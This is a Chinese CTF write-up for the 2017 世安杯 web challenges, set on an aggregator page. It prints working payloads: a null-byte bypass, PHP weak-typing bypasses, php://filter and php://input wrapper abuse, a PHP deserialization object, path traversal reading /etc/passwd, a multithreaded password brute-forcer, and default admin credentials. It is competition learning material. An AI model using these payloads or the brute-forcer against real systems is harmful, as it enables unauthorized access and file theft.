世安杯 CTF 2017 Writeup
source link: http://ultramangaia.github.io/blog/2017/%E4%B8%96%E5%AE%89%E6%9D%AF-ctf-2017.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
1. ctf 入门级题目
下源代码,发现可以利用ereg的00截断漏洞,burpsuite发送get请求/shian-rao/?password=1%00–
2. 曲奇饼
访问,一段不知名文字,然后发现网址/shian-quqi/index.php?line=&file=a2V5LnR4dA==
file参数明显base64编码过,base64解码为key.txt,然后我们修改为index.php,base64编码,加上line参数可以遍历index.php文件。得到源码
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['file'])?$_GET['file']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=a2V5LnR4dA==");
$file_list = array(
'0' =>'key.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){
$file_list[2]='thisis_flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>容易发现只要将file参数值改为thisis_flag.php的base64编码后的值,并且添加cookie
直接给了源码,通过php的弱类型漏洞绕过就好。
<?php
show_source(__FILE__);
$a=0;
$b=0;
$c=0;
$d=0;
if (isset($_GET['x1']))
{
$x1 = $_GET['x1'];
$x1=="1"?die("ha?"):NULL;
switch ($x1)
{
case 0:
case 1:
$a=1;
break;
}
}
$x2=(array)json_decode(@$_GET['x2']);
if(is_array($x2)){
is_numeric(@$x2["x21"])?die("ha?"):NULL;
if(@$x2["x21"]){
($x2["x21"]>2017)?$b=1:NULL;
}
if(is_array(@$x2["x22"])){
if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
$p = array_search("XIPU", $x2["x22"]);
$p===false?die("ha?"):NULL;
foreach($x2["x22"] as $key=>$val){
$val==="XIPU"?die("ha?"):NULL;
}
$c=1;
}
}
$x3 = $_GET['x3'];
if ($x3 != '15562') {
if (strstr($x3, 'XIPU')) {
if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
$d=1;
}
}
}
if($a && $b && $c && $d){
include "flag.php";
echo $flag;
}
?>==弱类型,则x1=b,is_numeric 直接用2018bcd绕过,后面比较的时候转换为数值2018,得b1=1array_search弱类型漏洞,XIPU字符串转数字为0,然后后面的$var==="XIPU"由于会检查类型,所以可以绕过
所以可以构造x2={“x21”:”2018a”,”x22”:[[0,1],0]}
后面的md5直接爆破即可,x3=XIPU18570
用户名默认了,密码看网页源代码有提示说为5位数字,验证码是非图片验证码,直接可以拿到
所以,爆破吧,生成一个00000-99999的字典,一个get拿到验证码,然后一个get测试一个密码,然后,建议开个多线程。
这里直接利用工具了,pkav HHTP Fuzzer
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import urllib, urllib2
import re
import threading
def get(begin):
right = 0
index = begin * 10000
while index < (begin + 1) * 10000:
URL = 'http://ctf1.shiyanbar.com/shian-s/index.php';
opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PHPSESSID=45cehecb1jv2jlsi591hv8l0m' + str(begin)))
try:
response = opener.open(URL)
except urllib2.HTTPError, e:
continue
data = response.read()
if re.search('服务器安全狗防护验证页面', data) != None:
continue
if re.search('<br><br>[0-9]*<br><br>', data) == None:
continue
rcode = re.search('<br><br>[0-9]*<br><br>', data).group()
rcode = rcode[8:11]
# print(index)
s = str(index)
if index < 10000:
s = s.zfill(5)
password = s
formdata = {'username': 'admin', 'password':password, 'randcode':rcode}
data_encoded = urllib.urlencode(formdata)
# req = urllib2.Request(URL, param)
URL += '?' + data_encoded
# print(URL)
# opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'PHPSESSID=45cehecb1jv2jlsi591hv8l0m' + str(begin)))
try:
response1 = opener.open(URL)
status = response1.getcode()
# print(status == 200)
except urllib2.HTTPError, e:
continue
f1 = open('log' + str(begin) + '.txt', 'a')
f1.write(str(index) + "\n")
f1.close()
data1 = response1.read()
if re.search('服务器安全狗防护验证页面', data1) != None:
continue
# print(re.search('验证码错误', data1))
# print(right)
if status == 200 and re.search('密码错误', data1) == None and re.search('验证码错误', data1) == None and re.search('服务器安全狗防护验证页面', data1) == None:
if right == 0:
right = 1
index -= 1
# print('right' + str(index))
else:
print(index)
f = open('log.txt', 'a')
f.write(str(index))
f.write(data1)
f.close()
break
else:
right = 0
index += 1
# res = urllib2.urlopen
# get(0)
for i in xrange(10):
t =threading.Thread(target=get,args=(i,))
t.start()5. admin
直接请求,
you are not admin !
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->可以用php伪协议绕过,user=php://input,然后post的数据为the user is admin
然后,include部分也可以用PHP伪协议读取文件,file=php://filter/convert.base64-encode/resource=index.php
<?php
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
if(preg_match("/f1a9/",$file)){
exit();
}else{
include($file); //class.php
$pass = unserialize($pass);
echo $pass;
}
}else{
echo "you are not admin ! ";
}
?>
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->然后发现了class.php,也拿下来
<?php
class Read{//f1a9.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>看到提示读取f1a9.php
然后,看到__toString方法和$pass = unserialize($pass);,想到反序列化漏洞,构造如下
GET /shian-du/index.php?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s:8:"f1a9.php";} HTTP/1.1
Host: ctf1.shiyanbar.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=cko7epgroock0vgau9amiri4l5
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 17
the user is admin然后,就想尝试下这个任意文件读取有多大权限,试了下/etc/passwd发现可以读取
GET /shian-du/index.php?user=php://input&file=php://filter/convert.base64-encode/resource=../../../../../etc/passwd HTTP/1.1
Host: ctf1.shiyanbar.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://src.shiyanbar.com/student/exam-second/seize-flag
Cookie: XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=cko7epgroock0vgau9amiri4l5
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 17
the user is admin然后,发现web都是在同一个服务器上面,尝试读取第一题的index.php看看,
发现可以,那么,原则上,通过这道题就可以直接kill掉所有的web题,具有较大危害(可惜前面的题目都已经自己做出来了)。
后台弱口令,这。。。admin/MetInfo
你会发现过不了这个这题就废了
phpmyadmin爆破弱口令这。。。root/abc123
又是一个wooyun上的已知漏洞利用,额,这个是不给网的,跟现实有点脱离吧
开始几分钟部分队伍未修改默认密码,是关于修改默认密码的问题吧,然而刚刚开始的时候服务器很卡很卡,自己都进不去,这。。。
Redis
和
Drupal
和
FFmpeg
的漏洞,嗯,这个的确是平时没有关注到
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至[email protected]
Recommend
-
14
32C3 CTF 两个Web题目的Writeup 一个狗
-
17
31C3 CTF web关writeup ∑-TEAM ·
-
11
ConsenSys CTF Writeup A writeup for the ConsenSys CTF "Ethereum Sandbox" samczsun 27 Feb 2019 • 4 min read Update: Memory offsets bite me f...
-
16
Jun 5, 2018 - 6 minute read - Comments - CTF
-
7
0x00 前言# 重拾半年多没更新的博客。毕竟此前写博客很大程度上是为了排解学业上每天机械性重复学习那点少到可怜的知识带来的烦闷,近...
-
6
本文首发于安全客:https://www.anquanke.com/post/id/244824
-
6
湖湘杯复赛Web 300 拿个shell就给flag看源码发现过滤了各种字符 <?php ini_set("display_errors", "On"); error_reporting(E_ALL | E_STRICT); if(!isset($_GET['content'])){ show_source(__FILE__); die(); } func...
-
4
Baby Ruby Escaping#!/usr/bin/env ruby require 'readline' proc { my_exit = Kernel.method(:exit!) my_puts = $stdout.method(:puts) ObjectSpace.each_object(Module) { |m| m.freeze if m != Readline } set_trace_func proc { |...
-
9
Pwn2win CTF 2017 Writeup 发布时间 : 2017-11-27 19:11 Black PentestingOur agents found a BSC server which is used to co...
-
5
brokenJsfuck直接console中跑发现报错后面加个] 看到最后面的(),应该是函数调用,去掉 who are you?设置cookie还是没有权限,从cookie入手,base64解码th...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK